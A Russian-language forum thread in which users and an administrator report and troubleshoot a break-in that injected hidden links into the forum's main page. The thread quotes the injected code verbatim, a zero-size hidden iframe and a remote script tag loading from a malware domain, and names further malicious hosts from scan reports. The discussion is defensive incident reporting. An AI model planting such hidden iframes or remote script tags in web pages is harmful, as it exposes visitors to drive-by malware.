Главная страница форуме содержит ссылку на фишинг-сайт

[pokibor]

Господа, информирую Вас о том, что главная страница содержит ссылки на сайт "http://google-analistyc.net/in.cgi?8", опознаваемый Касперским как использующийся для фишинга. Учитывая, что ранее ничего такого на форуме не было, подозреваю, что сие есть результат атаки или некой неизвестной махинации. Просьба администрации и модераторам разобраться, что к чему, ибо это совсем не дело. А если попадётся кто?

Строчек со ссылкой там несколько, и они имеют вид
<iframe src="http://google-analistyc.net/in.cgi?8" width="0" height="0" style="display:none"></iframe>
То есть открываются в iframe'е со всеми вытекающими (видимо, происходит автоматическое перенаправление; я, конечно, все такие фокусы блокировал)

[Actani]

pokibor
Спасибо. Мне тоже полчаса назад выдало похожее предупреждение. Ждём Мифиози.
Кстати, вчера-позавчера такого не было?

[pokibor]

Кстати, вчера-позавчера такого не было?

Я это заметил только минут за десять до создания темы, хотя захожу достаточно часто. Днём предупреждений не было. Пока разбирался, где именно ссылка (у меня было одновременно открыто несколько вкладок), пока копался в коде - время прошло. Возможно, ссылка была и раньше, просто очередной апдейт Касперского начал распознавать её как ссылку на фишинговый сайт.

[mifiozi]

Ситуэйшн мне весьма не ясный

Ычера ссылки действительно были, более того, ссылки были около названий категорий форума и виделись они в админке как "битые" и правке не подлежали, сейчас их там нет, все работает исправно, однако я совершенно случайно обнаруживаю, что у нас изменился пароль на MySQL.

В общем, ясно, что ничего не ясно, буду копаться.

[mifiozi]

Все, вот и найден корень зла
Наш сервер(не конкретно нас, ибо кому мы нужны?) ночью пытались взломать, утром заметили, поправили что нашли и сменили пароли.

Сейчас все должно быт нормально, еще вечерком поищу бекдоры на всякий случай.

[Fleur Delacour]

Сейчас все должно быт нормально

У меня не нормально, до сих пор предупреждения касперский выдает

[Gregory Gontha]

Fleur Delacour, может в кэше что осталось? Попробуйте почистить кэш, на всякий случай.

[mifiozi]

Хм, нет, действительно... они снова появились

Короче, буду думать)

[Альтаир Бергадлер]

Незнаю как там у вас, но вот у меня все вроче чисто, в исходном коде ссылки таковой нету...или уже нету....

[mifiozi]

Альтаир Бергадлер, периодически просто чищу в базе руками, казец на лицо, в базе произвольно сами меняются названия форумов, дописываются эти гребанные строчки.

На данный момент хочу предупредить всех - там стоит не ссылка, а фрейм, а значит хотим мы или нет, но страница прописанная та у нас на фоне открывается. Таким образом, в зависимости от того что именно злоумышленник хочет, вы уже могли попасться на атаку. Особенно это касается пользователей с ИЕ6 или любым другим старым браузером(новые версии не от веселого энтузиазма пишутся!).
Те, у кого есть возможность, желательно сидеть с браузеров свежих версий, с повышенной безопасностью и т.д.
В любом случае, пока есть угроза хоть какая-то я тему закрывать не буду, желательно поглядывать сюда кому интересно и установить и запустить антивирус. Если чего-нить найдется - сообщить сюда, возьмем вирусок и препарируем как лягушку

[pokibor]

Альтаир Бергадлер, периодически просто чищу в базе руками

Хм, а нельзя просто скрипт добавить, который бы сам из базы удалял периодически нужную запись? Или ещё лучше INSERT-тригер, не знаю правда есть ли они в MySQL...
P.S. Проверил: триггеры появились в MySQL 5.0. Так что вполне можно написать триггер, который будет при попытке вставить запись в нужные таблицы проверять, есть ли в этой записи iframe и если есть - запрещать вставку (ну или модификацию, конечно, если там update).

[Lady Astrel]

mifiozi, весь этот мусор на месте.

[mifiozi]

Хм, а нельзя просто скрипт добавить

Нет нельзя, подумай сам еще раз по поводу этой своей затеи и пойми почему.

Lady Astrel, вижу, значит сегодня буду думать снова

[Альтаир Бергадлер]

Все наверное уже видели но тем не мение мне кажется что это забавно:

Вредоносное ПО включает 193 exploit(s), 148 scripting exploit(s), 33 trojan(s). Успешное заражение в привело к запуску новых процессов (в среднем 0) на целевой машине.

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая bestpicturemedia.cn/.

мда...прям нерест вирусов...

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт google-analistyc.net действовал в качестве промежуточного звена в заражении других сайтов (135), включая cardcaptorsnet.org/, viharalt.dk/, munashii.org/.

из этих 135, 1-наш

Мда все это канешна несмешно...

ЗЫ: и что вы думаете, захожу я на сайт домена и вот те на картина Репина

Вредоносное ПО включает 32319 exploit(s), 43 trojan(s), 11 scripting exploit(s). Успешное заражение в привело к запуску новых процессов (в среднем 0) на целевой машине.

This site was hosted on 1 network(s) including AS29073 (ECATEL).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт bestpicturemedia.cn действовал в качестве промежуточного звена в заражении других сайтов (1129), включая basega.com/, tastytara.com/, zaceni.net.ru/.

[mifiozi]

Провожу еще один опыт - если в течение этого дня и вечера ничего не появится, то причина окажется весьма офигительной и я пойду убиваться об стену

[Lady Astrel]

mifiozi, всё на месте...

[mifiozi]

Все, я сдаюсь =(
В понедельник напишу администратору сервера

[Альтаир Бергадлер]

mifiozi, пробовал убивать весь тег <title>?

[Paradox]

Эта фигня на страничкеболее активная кажется стала

[pokibor]

Господа, "с радостью" сообщаю, что ссылочка на фишинговый сайт вернулась. Теперь она имеет вид
<script src="http://google-analistyc.net/urchin.js" type="text/javascript"></script>
и, как видно, ведёт на некий java-script код.

[Paradox]

Там несколько ссылок мелькает, не только гугловский ресурс. Меня в конце концов на какуюто страничку "sexidre..." выкинуло. Но там ошибка 404. Приходится вовремя "Остановить" в браузере жать.

[Actani]

Говорят, что сегодня починят.

[Paradox]

Проверил комп и очистил антивирусом ESET NOD 3.0.650 базы v.3732 (20090102). Далее сходил на главную страну форума (перекинуло на страницу с ошибкой 404) и на гл. страницу чата ( загрузилась нормально, но после зависла и начала жрать трафик. Сожрала пол метра и я её отрубил). Далее снова всё проверил НОДом, никаких вирусов не нашёл.
Эт я на тот случай, что может кто нибудь боится ходить на форум. Но 100% гарантиии всё равно же нету.

[Альтаир Бергадлер]

mifiozi , мда...как говорицца в се гениальное просто (С) вот и у нас, оказалось что достаточно изменить тэг и скрипт сломлецца, кароче от всей души поздравляю с победой.

ПС. На всякий случай проверил себя на вшивость нодом в. 3733, вроде подозрительных объектов не было.

[Paradox]

Всё внорме.
в.3733 гут=)